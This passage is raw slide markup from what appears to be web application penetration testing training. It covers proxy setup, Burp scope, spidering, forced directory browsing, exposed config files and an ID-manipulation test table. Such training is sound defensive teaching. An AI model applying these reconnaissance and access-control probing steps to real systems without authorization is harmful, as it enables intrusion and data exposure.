                        <a:t>error</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[4000]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>error</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[40000]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>error</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“id”:[400000000000]}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>{“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>customer”:”same</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> customer name”}</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82599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Browser Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="proxy_noFoxyProxy.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t="16239" b="16239"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2688002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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FoxyProxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> In Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="proxy_FoxyProxy.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="6569" b="6569"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="967417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Web App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="dojoBasic.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4734" b="15118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1197261"/>
            <a:ext cx="7623528" cy="3939390"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1783536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To Scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="add2Scope.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="3954" t="7695" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619890" y="1219906"/>
            <a:ext cx="7904220" cy="4137517"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="652590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 Scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="editScope_targetTab.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="4050" b="4050"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3677970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Source</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Proxy_viewSource_index.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8051" b="1643"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1197259"/>
            <a:ext cx="7623528" cy="4628656"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63606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Manually Spider Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="target_manual_spider_login_page.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-10945" t="7695" r="-2189" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-967619" y="1261445"/>
            <a:ext cx="10002762" cy="4137516"/>
          </a:xfrm>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3622755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Spider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="targetSpiderHost.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421" t="7695" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="639134" y="1234871"/>
            <a:ext cx="7865732" cy="4137517"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2523771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Site Map After Spider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="targetSpiderHost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7842" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1261398"/>
            <a:ext cx="7623528" cy="3875252"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1555140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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be explicit and well defined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 minimum of two accounts is needed when pen testing web or mobile applications.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="784197100"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="1744638"/>
          <a:ext cx="6096000" cy="2560320"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr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20040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Domain Name(s)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Web Services</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Subdomains</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>File Servers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Databases</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Internal Tools/Applications</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Load</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0"/>
                        <a:t> Balancers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>User Roles</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>WAFs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Accounts</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>IDS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Users</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Wireless Access Points</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Printers</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="320040">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>File Sharing (Share Point)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="38100"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
                        <a:t>IoT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="38100" marB="3810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291542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Force Directory/File Browse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FD752A0-EF6D-5144-9326-1910ED88B8DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1495647" y="1138701"/>
            <a:ext cx="6152707" cy="3650258"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1943955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Site Map After Forced Directory Browse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D4E538-0C35-434D-B424-E4A21E6E7790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964518" y="1290970"/>
            <a:ext cx="2383465" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEECFC6-A220-3447-BBBC-FD4E748F34EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2003098" y="1290970"/>
            <a:ext cx="2303088" cy="3403452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2772699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Robots File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="robots_browser.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125" t="5841"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1272078"/>
            <a:ext cx="7597870" cy="3618702"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="664938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Robots File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="robots_burp.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954" t="8376" b="8595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619890" y="1206987"/>
            <a:ext cx="7904220" cy="4419237"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741339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config.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="configInc_browser.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954" t="5531" b="11960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619890" y="1282039"/>
            <a:ext cx="7904220" cy="4090349"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3341478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config.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="configInc_burp.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640" t="7635" b="806"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1175880"/>
            <a:ext cx="7636357" cy="4692794"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010104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config.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="configInc_burp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478" t="7634" b="7898"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1207950"/>
            <a:ext cx="7649186" cy="4329343"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4240672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Myconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_browser.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954" t="5751" b="11961"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619890" y="1271571"/>
            <a:ext cx="7904220" cy="4079437"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3681054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MyConfig.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_browser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733" t="5971" b="11960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="651963" y="1294501"/>
            <a:ext cx="7840074" cy="4068526"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290540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MyConfig.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_browser2.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798" t="5739" b="11961"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613480" y="1261394"/>
            <a:ext cx="7917049" cy="4080032"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3736965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a:t>
            </a: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070875691"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1216429"/>
          <a:ext cx="8229600" cy="3771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9152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MyConfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_burp.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640" t="8052" b="8523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1207949"/>
            <a:ext cx="7636357" cy="4275896"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
